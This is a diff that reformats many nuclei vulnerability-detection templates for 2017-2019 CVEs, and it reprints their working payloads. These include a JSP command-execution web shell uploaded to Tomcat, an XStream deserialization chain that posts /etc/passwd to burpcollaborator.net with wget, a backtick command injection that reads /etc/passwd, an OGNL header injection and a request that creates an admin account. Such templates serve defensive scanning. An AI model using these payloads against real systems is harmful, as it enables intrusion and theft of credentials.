|
tags: cve,cve2017,ilo4,hpe
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
|
@ -7,10 +7,10 @@ info:
|
||||||
tags: cve,cve2017,apache,rce
|
tags: cve,cve2017,apache,rce
|
||||||
reference: https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615
|
reference: https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615
|
||||||
description: |
|
description: |
|
||||||
By design, you are not allowed to upload JSP files via the PUT method on the Apache Tomcat servers.
|
By design, you are not allowed to upload JSP files via the PUT method on the Apache Tomcat servers.
|
||||||
This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server.
|
This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server.
|
||||||
However, due to the insufficient checks, an attacker could gain remote code execution on 7.0.{0 to 79}
|
However, due to the insufficient checks, an attacker could gain remote code execution on 7.0.{0 to 79}
|
||||||
Tomcat servers that has enabled PUT by requesting PUT method on the Tomcat server using a specially crafted HTTP request.
|
Tomcat servers that has enabled PUT by requesting PUT method on the Tomcat server using a specially crafted HTTP request.
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: PUT
|
- method: PUT
|
||||||
|
@ -19,21 +19,21 @@ requests:
|
||||||
headers:
|
headers:
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
body: |
|
body: |
|
||||||
<%@ page import="java.util.*,java.io.*"%>
|
<%@ page import="java.util.*,java.io.*"%>
|
||||||
<%
|
<%
|
||||||
if (request.getParameter("cmd") != null) {
|
if (request.getParameter("cmd") != null) {
|
||||||
out.println("Command: " + request.getParameter("cmd") + "<BR>");
|
out.println("Command: " + request.getParameter("cmd") + "<BR>");
|
||||||
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
|
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
|
||||||
OutputStream os = p.getOutputStream();
|
OutputStream os = p.getOutputStream();
|
||||||
InputStream in = p.getInputStream();
|
InputStream in = p.getInputStream();
|
||||||
DataInputStream dis = new DataInputStream(in);
|
DataInputStream dis = new DataInputStream(in);
|
||||||
String disr = dis.readLine();
|
String disr = dis.readLine();
|
||||||
while ( disr != null ) {
|
while ( disr != null ) {
|
||||||
out.println(disr);
|
out.println(disr);
|
||||||
disr = dis.readLine();
|
disr = dis.readLine();
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
%>
|
%>
|
||||||
|
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
|
|
@ -6,10 +6,10 @@ info:
|
||||||
severity: critical
|
severity: critical
|
||||||
tags: cve,cve2017,solr,apache,oob,xxe
|
tags: cve,cve2017,solr,apache,oob,xxe
|
||||||
reference:
|
reference:
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-12629
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-12629
|
||||||
- https://twitter.com/honoki/status/1298636315613974532
|
- https://twitter.com/honoki/status/1298636315613974532
|
||||||
- https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE
|
- https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE
|
||||||
- https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-RCE
|
- https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-RCE
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
|
|
|
@ -7,9 +7,9 @@ info:
|
||||||
description: Directory traversal vulnerability in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS in SAP NetWeaver Application Server Java 7.5 allows remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657.
|
description: Directory traversal vulnerability in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS in SAP NetWeaver Application Server Java 7.5 allows remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657.
|
||||||
tags: cve,cve2017,sap,lfi
|
tags: cve,cve2017,sap,lfi
|
||||||
reference:
|
reference:
|
||||||
- https://www.cvedetails.com/cve/CVE-2017-12637/
|
- https://www.cvedetails.com/cve/CVE-2017-12637/
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-12637
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-12637
|
||||||
- https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_SAP-Bugs-The-Phantom-Security.pdf
|
- https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_SAP-Bugs-The-Phantom-Security.pdf
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -5,8 +5,8 @@ info:
|
||||||
author: pikpikcu
|
author: pikpikcu
|
||||||
severity: high
|
severity: high
|
||||||
reference:
|
reference:
|
||||||
- https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/
|
- https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/
|
||||||
- https://www.exploit-db.com/exploits/49913
|
- https://www.exploit-db.com/exploits/49913
|
||||||
tags: cve,cve2017,trixbox,rce
|
tags: cve,cve2017,trixbox,rce
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
|
@ -7,9 +7,9 @@ info:
|
||||||
tags: cve,cve2017,trixbox,lfi
|
tags: cve,cve2017,trixbox,lfi
|
||||||
description: trixbox 2.8.0.4 has path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php.
|
description: trixbox 2.8.0.4 has path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php.
|
||||||
reference:
|
reference:
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-14537
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-14537
|
||||||
- https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/
|
- https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/
|
||||||
- https://sourceforge.net/projects/asteriskathome/ # vendor homepage
|
- https://sourceforge.net/projects/asteriskathome/ # vendor homepage
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
|
|
|
@ -4,8 +4,8 @@ info:
|
||||||
name: PreAuth RCE on Palo Alto GlobalProtect
|
name: PreAuth RCE on Palo Alto GlobalProtect
|
||||||
author: emadshanab,milo2012
|
author: emadshanab,milo2012
|
||||||
reference:
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/43342
|
- https://www.exploit-db.com/exploits/43342
|
||||||
- http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html
|
- http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html
|
||||||
severity: high
|
severity: high
|
||||||
tags: cve,cve2017,rce,vpn,paloalto,globalprotect
|
tags: cve,cve2017,rce,vpn,paloalto,globalprotect
|
||||||
|
|
||||||
|
|
|
@ -7,8 +7,8 @@ info:
|
||||||
severity: high
|
severity: high
|
||||||
tags: cve,cve2017,weblogic,oracle,rce,oob
|
tags: cve,cve2017,weblogic,oracle,rce,oob
|
||||||
reference:
|
reference:
|
||||||
- https://hackerone.com/reports/810778
|
- https://hackerone.com/reports/810778
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-3506
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-3506
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
|
|
|
@ -5,8 +5,8 @@ info:
|
||||||
author: 0x_Akoko
|
author: 0x_Akoko
|
||||||
severity: low
|
severity: low
|
||||||
reference:
|
reference:
|
||||||
- https://blog.zsec.uk/cve-2017-3528/
|
- https://blog.zsec.uk/cve-2017-3528/
|
||||||
- https://www.exploit-db.com/exploits/43592
|
- https://www.exploit-db.com/exploits/43592
|
||||||
tags: oracle,redirect
|
tags: oracle,redirect
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
|
@ -7,8 +7,8 @@ info:
|
||||||
description: wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request.
|
description: wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request.
|
||||||
tags: cve,cve2017,wordpress
|
tags: cve,cve2017,wordpress
|
||||||
reference:
|
reference:
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-5487
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-5487
|
||||||
- https://www.exploit-db.com/exploits/41497
|
- https://www.exploit-db.com/exploits/41497
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -10,15 +10,15 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
GET / HTTP/1.1
|
GET / HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
|
Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
|
||||||
Accept-Language: en
|
Accept-Language: en
|
||||||
Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Hacker','Bounty Plz')}.multipart/form-data
|
Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Hacker','Bounty Plz')}.multipart/form-data
|
||||||
Connection: Keep-Alive
|
Connection: Keep-Alive
|
||||||
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
|
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
|
||||||
Pragma: no-cache
|
Pragma: no-cache
|
||||||
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
|
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
|
|
|
@ -18,63 +18,63 @@ requests:
|
||||||
headers:
|
headers:
|
||||||
Content-Type: application/xml
|
Content-Type: application/xml
|
||||||
body: |
|
body: |
|
||||||
<map>
|
<map>
|
||||||
<entry>
|
<entry>
|
||||||
<jdk.nashorn.internal.objects.NativeString>
|
<jdk.nashorn.internal.objects.NativeString>
|
||||||
<flags>0</flags>
|
<flags>0</flags>
|
||||||
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
|
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
|
||||||
<dataHandler>
|
<dataHandler>
|
||||||
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
|
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
|
||||||
<is class="javax.crypto.CipherInputStream">
|
<is class="javax.crypto.CipherInputStream">
|
||||||
<cipher class="javax.crypto.NullCipher">
|
<cipher class="javax.crypto.NullCipher">
|
||||||
<initialized>false</initialized>
|
<initialized>false</initialized>
|
||||||
<opmode>0</opmode>
|
<opmode>0</opmode>
|
||||||
<serviceIterator class="javax.imageio.spi.FilterIterator">
|
<serviceIterator class="javax.imageio.spi.FilterIterator">
|
||||||
<iter class="javax.imageio.spi.FilterIterator">
|
<iter class="javax.imageio.spi.FilterIterator">
|
||||||
<iter class="java.util.Collections$EmptyIterator"/>
|
<iter class="java.util.Collections$EmptyIterator"/>
|
||||||
<next class="java.lang.ProcessBuilder">
|
<next class="java.lang.ProcessBuilder">
|
||||||
<command>
|
<command>
|
||||||
<string>wget</string>
|
<string>wget</string>
|
||||||
<string>--post-file</string>
|
<string>--post-file</string>
|
||||||
<string>/etc/passwd</string>
|
<string>/etc/passwd</string>
|
||||||
<string>burpcollaborator.net</string>
|
<string>burpcollaborator.net</string>
|
||||||
</command>
|
</command>
|
||||||
<redirectErrorStream>false</redirectErrorStream>
|
<redirectErrorStream>false</redirectErrorStream>
|
||||||
</next>
|
</next>
|
||||||
</iter>
|
</iter>
|
||||||
<filter class="javax.imageio.ImageIO$ContainsFilter">
|
<filter class="javax.imageio.ImageIO$ContainsFilter">
|
||||||
<method>
|
<method>
|
||||||
<class>java.lang.ProcessBuilder</class>
|
<class>java.lang.ProcessBuilder</class>
|
||||||
<name>start</name>
|
<name>start</name>
|
||||||
<parameter-types/>
|
<parameter-types/>
|
||||||
</method>
|
</method>
|
||||||
<name>asdasd</name>
|
<name>asdasd</name>
|
||||||
</filter>
|
</filter>
|
||||||
<next class="string">asdasd</next>
|
<next class="string">asdasd</next>
|
||||||
</serviceIterator>
|
</serviceIterator>
|
||||||
<lock/>
|
<lock/>
|
||||||
</cipher>
|
</cipher>
|
||||||
<input class="java.lang.ProcessBuilder$NullInputStream"/>
|
<input class="java.lang.ProcessBuilder$NullInputStream"/>
|
||||||
<ibuffer></ibuffer>
|
<ibuffer></ibuffer>
|
||||||
<done>false</done>
|
<done>false</done>
|
||||||
<ostart>0</ostart>
|
<ostart>0</ostart>
|
||||||
<ofinish>0</ofinish>
|
<ofinish>0</ofinish>
|
||||||
<closed>false</closed>
|
<closed>false</closed>
|
||||||
</is>
|
</is>
|
||||||
<consumed>false</consumed>
|
<consumed>false</consumed>
|
||||||
</dataSource>
|
</dataSource>
|
||||||
<transferFlavors/>
|
<transferFlavors/>
|
||||||
</dataHandler>
|
</dataHandler>
|
||||||
<dataLen>0</dataLen>
|
<dataLen>0</dataLen>
|
||||||
</value>
|
</value>
|
||||||
</jdk.nashorn.internal.objects.NativeString>
|
</jdk.nashorn.internal.objects.NativeString>
|
||||||
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
|
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
|
||||||
</entry>
|
</entry>
|
||||||
<entry>
|
<entry>
|
||||||
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
|
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
|
||||||
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
|
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
|
||||||
</entry>
|
</entry>
|
||||||
</map>
|
</map>
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -5,8 +5,8 @@ info:
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: medium
|
severity: medium
|
||||||
reference:
|
reference:
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-16059
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-16059
|
||||||
- https://www.exploit-db.com/exploits/45342
|
- https://www.exploit-db.com/exploits/45342
|
||||||
tags: cve,cve2018,iot,lfi
|
tags: cve,cve2018,iot,lfi
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
|
@ -5,8 +5,8 @@ info:
|
||||||
author: 0x240x23elu
|
author: 0x240x23elu
|
||||||
severity: critical
|
severity: critical
|
||||||
reference:
|
reference:
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-16283
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-16283
|
||||||
- https://www.exploit-db.com/exploits/45438
|
- https://www.exploit-db.com/exploits/45438
|
||||||
tags: cve,cve2018,wordpress,wp-plugin,lfi
|
tags: cve,cve2018,wordpress,wp-plugin,lfi
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
|
@ -7,8 +7,8 @@ info:
|
||||||
description: Comodo Firewall & Central Manager (UTM) All Release before 2.7.0 & 1.5.0 Remote Code Execution (Web Shell based)
|
description: Comodo Firewall & Central Manager (UTM) All Release before 2.7.0 & 1.5.0 Remote Code Execution (Web Shell based)
|
||||||
tags: cve,cve2018,comodo,rce
|
tags: cve,cve2018,comodo,rce
|
||||||
reference:
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/48825
|
- https://www.exploit-db.com/exploits/48825
|
||||||
- https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276
|
- https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
|
|
|
@ -7,7 +7,7 @@ info:
|
||||||
description: The Embedthis HTTP library, and Appweb versions before 7.0.3, have a logic flaw related to the authCondition function in http/httpLib.c. With a forged HTTP request, it is possible to bypass authentication for the form and digest login types.
|
description: The Embedthis HTTP library, and Appweb versions before 7.0.3, have a logic flaw related to the authCondition function in http/httpLib.c. With a forged HTTP request, it is possible to bypass authentication for the form and digest login types.
|
||||||
tags: cve,cve2018,appweb,auth-bypass
|
tags: cve,cve2018,appweb,auth-bypass
|
||||||
reference:
|
reference:
|
||||||
- https://github.com/embedthis/appweb/issues/610
|
- https://github.com/embedthis/appweb/issues/610
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
|
|
|
@ -6,9 +6,9 @@ info:
|
||||||
author: pdteam
|
author: pdteam
|
||||||
severity: critical
|
severity: critical
|
||||||
reference:
|
reference:
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-0193
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-0193
|
||||||
- https://github.com/vulhub/vulhub/tree/master/solr/CVE-2019-0193
|
- https://github.com/vulhub/vulhub/tree/master/solr/CVE-2019-0193
|
||||||
- https://paper.seebug.org/1009/
|
- https://paper.seebug.org/1009/
|
||||||
tags: cve,cve2019,apache,rce,solr,oob
|
tags: cve,cve2019,apache,rce,solr,oob
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
|
@ -9,10 +9,10 @@ info:
|
||||||
- https://wwws.nightwatchcybersecurity.com/2019/05/27/xss-in-ssi-printenv-command-apache-tomcat-cve-2019-0221/
|
- https://wwws.nightwatchcybersecurity.com/2019/05/27/xss-in-ssi-printenv-command-apache-tomcat-cve-2019-0221/
|
||||||
- https://www.exploit-db.com/exploits/50119
|
- https://www.exploit-db.com/exploits/50119
|
||||||
description: |
|
description: |
|
||||||
The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and
|
The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and
|
||||||
7.0.0 to 7.0.93 echoes user provided data without escaping and is,
|
7.0.0 to 7.0.93 echoes user provided data without escaping and is,
|
||||||
therefore, vulnerable to XSS. SSI is disabled by default.
|
therefore, vulnerable to XSS. SSI is disabled by default.
|
||||||
The printenv command is intended for debugging and is unlikely to be present in a production website.
|
The printenv command is intended for debugging and is unlikely to be present in a production website.
|
||||||
tags: cve,cve2019,apache,xss
|
tags: cve,cve2019,apache,xss
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
|
@ -12,7 +12,7 @@ info:
|
||||||
google-dork: inurl:"/timesheet/login.php"
|
google-dork: inurl:"/timesheet/login.php"
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw: # Metod POST From login.php
|
- raw: # Metod POST From login.php
|
||||||
- |
|
- |
|
||||||
POST /timesheet/login.php HTTP/1.1
|
POST /timesheet/login.php HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
|
@ -7,9 +7,9 @@ info:
|
||||||
severity: medium
|
severity: medium
|
||||||
tags: cve,cve2019,phpmyadmin,csrf
|
tags: cve,cve2019,phpmyadmin,csrf
|
||||||
reference:
|
reference:
|
||||||
- https://www.phpmyadmin.net/security/PMASA-2019-4/
|
- https://www.phpmyadmin.net/security/PMASA-2019-4/
|
||||||
- https://www.exploit-db.com/exploits/46982
|
- https://www.exploit-db.com/exploits/46982
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-12616
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-12616
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
@ -32,4 +32,4 @@ requests:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
- 401 #password protected
|
- 401 # password protected
|
||||||
|
|
|
@ -7,9 +7,9 @@ info:
|
||||||
severity: critical
|
severity: critical
|
||||||
tags: cve,cve2019,dlink,router,iot
|
tags: cve,cve2019,dlink,router,iot
|
||||||
reference:
|
reference:
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-13101
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-13101
|
||||||
- https://github.com/d0x0/D-Link-DIR-600M
|
- https://github.com/d0x0/D-Link-DIR-600M
|
||||||
- https://www.exploit-db.com/exploits/47250
|
- https://www.exploit-db.com/exploits/47250
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
|
|
|
@ -6,7 +6,7 @@ info:
|
||||||
description: In Grafana 2.x through 6.x before 6.3.4, parts of the HTTP API allow unauthenticated use. This makes it possible to run a denial of service attack against the server running Grafana.
|
description: In Grafana 2.x through 6.x before 6.3.4, parts of the HTTP API allow unauthenticated use. This makes it possible to run a denial of service attack against the server running Grafana.
|
||||||
reference:
|
reference:
|
||||||
- https://grafana.com/blog/2019/08/29/grafana-5.4.5-and-6.3.4-released-with-important-security-fix/
|
- https://grafana.com/blog/2019/08/29/grafana-5.4.5-and-6.3.4-released-with-important-security-fix/
|
||||||
- https://community.grafana.com/t/grafana-5-4-5-and-6-3-4-security-update/20569 Vendor Advisory
|
- https://community.grafana.com/t/grafana-5-4-5-and-6-3-4-security-update/20569 Vendor Advisory
|
||||||
- https://community.grafana.com/t/release-notes-v6-3-x/19202
|
- https://community.grafana.com/t/release-notes-v6-3-x/19202
|
||||||
tags: cve,cve2019,grafana
|
tags: cve,cve2019,grafana
|
||||||
|
|
||||||
|
|
|
@ -9,7 +9,7 @@ info:
|
||||||
tags: cve,cve2019,webmin,rce
|
tags: cve,cve2019,webmin,rce
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw: #
|
- raw: #
|
||||||
- |
|
- |
|
||||||
POST /password_change.cgi HTTP/1.1
|
POST /password_change.cgi HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
|
@ -6,8 +6,8 @@ info:
|
||||||
description: |
|
description: |
|
||||||
core/api/user.go in Harbor 1.7.0 through 1.8.2 allows non-admin users to create admin accounts via the POST /api/users API, when Harbor is setup with DB as authentication backend and allow user to do self-registration. Fixed version: v1.7.6 v1.8.3. v.1.9.0. Workaround without applying the fix: configure Harbor to use non-DB authentication backend such as LDAP.
|
core/api/user.go in Harbor 1.7.0 through 1.8.2 allows non-admin users to create admin accounts via the POST /api/users API, when Harbor is setup with DB as authentication backend and allow user to do self-registration. Fixed version: v1.7.6 v1.8.3. v.1.9.0. Workaround without applying the fix: configure Harbor to use non-DB authentication backend such as LDAP.
|
||||||
reference:
|
reference:
|
||||||
- https://unit42.paloaltonetworks.com/critical-vulnerability-in-harbor-enables-privilege-escalation-from-zero-to-admin-cve-2019-16097/
|
- https://unit42.paloaltonetworks.com/critical-vulnerability-in-harbor-enables-privilege-escalation-from-zero-to-admin-cve-2019-16097/
|
||||||
- https://github.com/goharbor/harbor/issues/8951
|
- https://github.com/goharbor/harbor/issues/8951
|
||||||
tags: cve,cve2019,intrusive,harbor
|
tags: cve,cve2019,intrusive,harbor
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
@ -17,7 +17,7 @@ requests:
|
||||||
headers:
|
headers:
|
||||||
Content-Type: application/json
|
Content-Type: application/json
|
||||||
body: |
|
body: |
|
||||||
{"username": "testpoc", "has_admin_role": true, "password": "TestPoc!", "email": "testpoc@example.com", "realname": "poc"}
|
{"username": "testpoc", "has_admin_role": true, "password": "TestPoc!", "email": "testpoc@example.com", "realname": "poc"}
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -14,7 +14,7 @@ requests:
|
||||||
- "{{BaseURL}}/getcfg.php"
|
- "{{BaseURL}}/getcfg.php"
|
||||||
|
|
||||||
body: |
|
body: |
|
||||||
SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a
|
SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a
|
||||||
headers:
|
headers:
|
||||||
Content-Type: text/xml
|
Content-Type: text/xml
|
||||||
|
|
||||||
|
|
|
@ -6,8 +6,8 @@ info:
|
||||||
severity: high
|
severity: high
|
||||||
description: Oracle Business Intelligence / XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - XML External Entity Injection
|
description: Oracle Business Intelligence / XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - XML External Entity Injection
|
||||||
reference:
|
reference:
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-2616
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-2616
|
||||||
- https://www.exploit-db.com/exploits/46729
|
- https://www.exploit-db.com/exploits/46729
|
||||||
tags: cve,cve2019,oracle,xxe,oob
|
tags: cve,cve2019,oracle,xxe,oob
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
|
@ -6,8 +6,8 @@ info:
|
||||||
severity: high
|
severity: high
|
||||||
description: Vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware. The supported version that is affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise BI Publisher (formerly XML Publisher).
|
description: Vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware. The supported version that is affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise BI Publisher (formerly XML Publisher).
|
||||||
reference:
|
reference:
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-2767
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-2767
|
||||||
- https://www.exploit-db.com/exploits/46729
|
- https://www.exploit-db.com/exploits/46729
|
||||||
tags: cve,cve2019,oracle,xxe,oob
|
tags: cve,cve2019,oracle,xxe,oob
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
|
@ -10,16 +10,16 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
POST /rest/tinymce/1/macro/preview HTTP/1.1
|
POST /rest/tinymce/1/macro/preview HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Accept: */*
|
Accept: */*
|
||||||
Accept-Language: en-US,en;q=0.5
|
Accept-Language: en-US,en;q=0.5
|
||||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
|
||||||
Referer: {{Hostname}}
|
Referer: {{Hostname}}
|
||||||
Content-Length: 168
|
Content-Length: 168
|
||||||
Connection: close
|
Connection: close
|
||||||
|
|
||||||
{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}}
|
{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}}
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -6,8 +6,8 @@ info:
|
||||||
severity: critical
|
severity: critical
|
||||||
tags: cve,cve2019,nexus,rce
|
tags: cve,cve2019,nexus,rce
|
||||||
reference:
|
reference:
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-7238
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-7238
|
||||||
- https://github.com/jas502n/CVE-2019-7238
|
- https://github.com/jas502n/CVE-2019-7238
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
|
|
|
@ -11,7 +11,7 @@ info:
|
||||||
tags: cve,cve2019,emerge,rce
|
tags: cve,cve2019,emerge,rce
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw: # Default Port
|
- raw: # Default Port
|
||||||
- |
|
- |
|
||||||
GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60 HTTP/1.1
|
GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60 HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
|
@ -13,22 +13,22 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
